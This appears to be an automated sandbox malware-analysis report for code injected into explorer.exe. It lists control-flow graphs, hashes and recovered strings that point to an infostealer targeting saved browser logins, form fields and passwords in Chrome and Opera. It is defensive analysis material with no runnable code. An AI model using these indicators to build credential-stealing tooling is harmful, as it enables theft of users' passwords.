                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 417 107cd2dd-107cd320 call 107d8942 420 107cd3fa-107cd40e 417->420 421 107cd326 417->421 422 107cd328-107cd339 SleepEx 421->422 422->422 423 107cd33b-107cd341 422->423 424 107cd34b-107cd352 423->424 425 107cd343-107cd349 423->425 427 107cd354-107cd35a 424->427 428 107cd370-107cd376 424->428 425->424 426 107cd35c-107cd36a call 107d7f12 425->426 426->428 427->426 427->428 429 107cd378-107cd37e 428->429 430 107cd3b7-107cd3bd 428->430 429->430 432 107cd380-107cd38a 429->432 433 107cd3bf-107cd3cf call 107cde72 430->433 434 107cd3d4-107cd3db 430->434 432->430 436 107cd38c-107cd3b1 call 107ce432 432->436 433->434 434->422 438 107cd3e1-107cd3f5 call 107cd0f2 434->438 436->430 438->422
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction ID: 39f3c6323b17df9db76a0890d9a0cfa4e5e77adb64b8388955a3601206e7f0cb
                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction Fuzzy Hash: 9E316BB4A14B8ADFDB94EF699188395F7A0FB54300F45467EC91DCA206CB34A850CF92
                                            Function 107CD412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 453 107cd412-107cd446 call 107d8942 456 107cd448-107cd472 call 107dac9e CreateThread 453->456 457 107cd473-107cd47d 453->457
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction ID: 638f93176407392d0a342decfd1bac8838ecdfda2fa903ec6cf4518ddae6a445
                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction Fuzzy Hash: 4CF0F634268B494FD788EF6CD44563AF3D0FBE8215F45063EA98DC3364DA39D9818716

                                            Non-executed Functions

                                            Function 0E771D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 7a478578d5bad902043f5b2bfb903f20d43e882dd8f64be61fda6d69db378d18
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: EDE15A70518F488FDB64EF68C4987ABB7E1FB58300F504A2E959BC7265DF30A941CB86
                                            Function 0E774792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: ca1e0ff9ddaf39888a9cc18cfff2bfbd35dbb842e4e1e9548e7db3f0279e2095
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: A8B15B30618B488EDB55EF68C489AEEB7F1FF98300F50491ED49AC7261EF709945CB86
                                            Function 0E772622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: 347ddecec62d175c789b586c8c40bbe364ff1ad466e4da0d7d6ee29ad27de902
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: 3441C5B0A18B488FDF18EF88A4556AD7BF2FB48700F00025ED449D3361DB709D458BD6
                                            Function 0E779AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: 7a05a87c0f659ceecf7fba7c1bafcbc626f6e3b801f992d652805c88f56313f0
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: F4C15C71218F099FCB59EF64C4996DAF3E1FB98304F404B2E959AC7220DF70A915CB86
                                            Function 0E779F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: c063ca78c31c6dd32671c14170fd3d3f077c1e7c53bc58e4907261c52c7e921d
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: 9F51D6311187488FEB19DF18D4852AEB7E5FBC5304F50192EE8CBC7251DBB49906CB82
                                            Function 0E7732F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: d91050aa925a579b824a3c74f201550ce0e852d49796141eb8d63352514ac0d1
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: 62C1A270618A194FCB58EF68D499AEAF3E1FB98300F554769848AC7265DF30DE02CBC5
                                            Function 0E7732F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: d7d59451b3fd5b9431a31ff5aeb5671e8b10195e519677d5963ffb950937ce62
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 50C1A270618A194FCB58EF68D499AAAF3E1FB98300F55476D848AC7264DF30DE01CBC5
                                            Function 0E774CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: 7e40ffa2fe269b1535310ec75b2c019314f111e9da2efc87942f90cf60bf1039
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: 58A191706187488BDB19EFA8D448BEEB7E1FF88310F404A2DD48AD7251EF709945CB89
                                            Function 0E774CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: 6b8c3711c4262eef64a410cb94027ae9f56a47e5f03542d1d839d7474ea63c09
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: 809190706187488BDB19EFA8D444BEEB7E1FF88300F404A2EE48AD7251EF709945CB85
                                            Function 0E774352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: 3222c77cd2bfe525a8e0cf7e7392f45772825bcbc8b9cfdf98f16abb9c6be538
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: CC719431618B488FDB58EFA8C4887AAB7F1FF58304F00062ED49AC7221EB71DD458B81
                                            Function 0E76FC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 4f69ef8c2425f973c4bf96ccaa673c8f7a6629c4ce1fc0a1f6838514e1f0db65
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: 48515EB0918B4C8FDB54EFA4C044AEEB7F1FF58300F404A2E949AE7214EF3099518B89
                                            Function 0E77086F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 47013830d95fcaa280cb82097a85b326932ac6c3825a5cb7acdfb54dd8448861
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: A6415F30618B4C8BDFA5EF2498557EA77E5FB98301F414A2E989EC7250EF30D9458B82
                                            Function 0E7724B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: b94933076cf4f371d5653512c3a1dd01018cb4886e70a635f6dbbaf789bb71fa
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: EB417370A28E4D8FDF58EF58D0A87AD77E1FB58300F40456A984ED7221EA70D9809BC6
                                            Function 0E770432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: f0d03b05a907fd5bc78372f479f091110890ab65214ae8c21ea288688ad8bc18
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 7B418270618B488FDBA9DF2880887AAB7E1FB99300F104A2E949EC3265DB70D945CB41
                                            Function 0E7770B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: d87b772fae008872bfb849211afe785daf325a1a122f165ef29c2b8f6d04be61
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: 7931B071509B885FDB1AEF68C4886DAB7D4FB98300F50491EE4DBD7261EA30A949CB43
                                            Function 0E7770C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 44f0ecbb036b320de0b1b4b9a96fe46f8196ea0ae03033390fe4aa6f0009f246
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: D931B271508B485FDB1ADF24C4886EAB7D5FB98300F50491EE4DBD7261EE30A945CA43
                                            Function 0E772FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: c4b7439e42bcf091780f012177c38833dd0c31923c574216d66e7826cf0e01e5
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 1E316470218B484FCB85EF689498BAAB7E1FF98300F94496D948ECB265DF30CD45CB52
                                            Function 0E772FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: f7b9c2a261c7c58230a0441a5f7382ff28cd952980d25fb1a3395721bd0b75d5
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: 05316670218B484FCB55EF589498BAAB7E1FF98300F944A7D948ACB265DF30CD45CB52
                                            Function 0E7758C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 34f1f53aa9a99bfb424cc7edec3018a343180864932e5229fdfb768732b2e93b
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: CE31B131614A0C8BDF45EFA8D8887EEB7E1FB5C214F40462AD49ED7250DE748A45CB89
                                            Function 0E7758BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 55c0ed4fa599f61cf341e644bbb791ec4be139adfbb733060f58109522cc0d38
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 88219370614A4C8BDF05EFA8C8487EEBBE1FF5C214F40461AD49AD7260DE748A45CB89
                                            Function 0E776E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: 9d297c85f1b5c35e74b550e1c410b41b4979fcba32c2810daedc0d16f5201bba
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: C1216D70A24A0D9BDB04EFA8D4487EEBBF1FB1C304F504A2DD149E3610DB749951CB84
                                            Function 0E776E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: 968b6d837669ab61504c421f9d4a5d88a6d71fbc3763739444a45a4fe2789962
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: 69215C70A24A0D9FDB44EFA8D4487AEBAF1FB5C304F504A2ED149E3620DB749991CB84
                                            Function 0E776FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: 9b070593542476b801ad5a1023cb34196e2aa49af73013bb58860e9b72ab0bbc
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: E521AC30624B0D8BCF05DF9998906AEB7E1EF88344F004A1AE44AEB258D7B0DD148BC2

                                            Execution Graph

                                            Execution Coverage:1.6%
                                            Dynamic/Decrypted Code Coverage:6.8%
                                            Signature Coverage:0%
                                            Total number of Nodes:620
                                            Total number of Limit Nodes:69
                                            execution_graph 112063 bcf08d 112066 bcb9d0 112063->112066 112067 bcb9f6 112066->112067 112074 bb9d40 112067->112074 112069 bcba02 112072 bcba26 112069->112072 112082 bb8f30 112069->112082 112120 bca6b0 112072->112120 112123 bb9c90 112074->112123 112076 bb9d4d 112077 bb9d54 112076->112077 112135 bb9c30 112076->112135 112077->112069 112083 bb8f57 112082->112083 112555 bbb1c0 112083->112555 112085 bb8f69 112559 bbaf10 112085->112559 112087 bb8f86 112095 bb8f8d 112087->112095 112630 bbae40 LdrLoadDll 112087->112630 112089 bb90f2 112089->112072 112091 bb8ffc 112575 bbf410 112091->112575 112093 bb9006 112093->112089 112094 bcbf90 2 API calls 112093->112094 112096 bb902a 112094->112096 112095->112089 112563 bbf380 112095->112563 112097 bcbf90 2 API calls 112096->112097 112098 bb903b 112097->112098 112099 bcbf90 2 API calls 112098->112099 112100 bb904c 112099->112100 112587 bbca90 112100->112587 112102 bb9059 112103 bc4a50 8 API calls 112102->112103 112104 bb9066 112103->112104 112105 bc4a50 8 API calls 112104->112105 112106 bb9077 112105->112106 112107 bb90a5 112106->112107 112108 bb9084 112106->112108 112110 bc4a50 8 API calls 112107->112110 112597 bbd620 112108->112597 112116 bb90c1 112110->112116 112112 bb90e9 112114 bb8d00 23 API calls 112112->112114 112114->112089 112115 bb9092 112613 bb8d00 112115->112613 112116->112112 112631 bbd6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 112116->112631 112121 bcaf60 LdrLoadDll 112120->112121 112122 bca6cf 112121->112122 112154 bc8bc0 112123->112154 112127 bb9cb6 112127->112076 112128 bb9cac 112128->112127 112161 bcb2b0 112128->112161 112130 bb9cf3 112130->112127 112172 bb9ab0 112130->112172 112132 bb9d13 112178 bb9620 LdrLoadDll 112132->112178 112134 bb9d25 112134->112076 112530 bcb5a0 112135->112530 112138 bcb5a0 LdrLoadDll 112139 bb9c5b 112138->112139 112140 bcb5a0 LdrLoadDll 112139->112140 112141 bb9c71 112140->112141 112142 bbf180 112141->112142 112143 bbf199 112142->112143 112538 bbb040 112143->112538 112145 bbf1ac 112542 bca1e0 112145->112542 112149 bbf1d2 112150 bbf1fd 112149->112150 112548 bca260 112149->112548 112152 bca490 2 API calls 112150->112152 112153 bb9d65 112152->112153 112153->112069 112155 bc8bcf 112154->112155 112179 bc4e50 112155->112179 112157 bb9ca3 112158 bc8a70 112157->112158 112185 bca600 112158->112185 112162 bcb2c9 112161->112162 112192 bc4a50 112162->112192 112164 bcb2e1 112165 bcb2ea 112164->112165 112231 bcb0f0 112164->112231 112165->112130 112167 bcb2fe 112167->112165 112249 bc9f00 112167->112249 112508 bb7ea0 112172->112508 112174 bb9ad1 112174->112132 112175 bb9aca 112175->112174 112521 bb8160 112175->112521 112178->112134 112180 bc4e6a 112179->112180 112181 bc4e5e 112179->112181 112180->112157 112181->112180 112184 bc52d0 LdrLoadDll 112181->112184 112183 bc4fbc 112183->112157 112184->112183 112186 bc8a85 112185->112186 112188 bcaf60 112185->112188 112186->112128 112189 bcaf70 112188->112189 112191 bcaf92 112188->112191 112190 bc4e50 LdrLoadDll 112189->112190 112190->112191 112191->112186 112193 bc4d85 112192->112193 112203 bc4a64 112192->112203 112193->112164 112196 bc4b7d 112196->112164 112197 bc4b90 112260 bca360 112197->112260 112198 bc4b73 112317 bca460 LdrLoadDll 112198->112317 112201 bc4bb7 112202 bcbdc0 2 API calls 112201->112202 112206 bc4bc3 112202->112206 112203->112193 112257 bc9c50 112203->112257 112204 bc4d49 112207 bca490 2 API calls 112204->112207 112205 bc4d5f 112326 bc4790 LdrLoadDll NtReadFile NtClose 112205->112326 112206->112196 112206->112204 112206->112205 112211 bc4c52 112206->112211 112208 bc4d50 112207->112208 112208->112164 112210 bc4d72 112210->112164 112212 bc4cb9 112211->112212 112214 bc4c61 112211->112214 112212->112204 112213 bc4ccc 112212->112213 112319 bca2e0 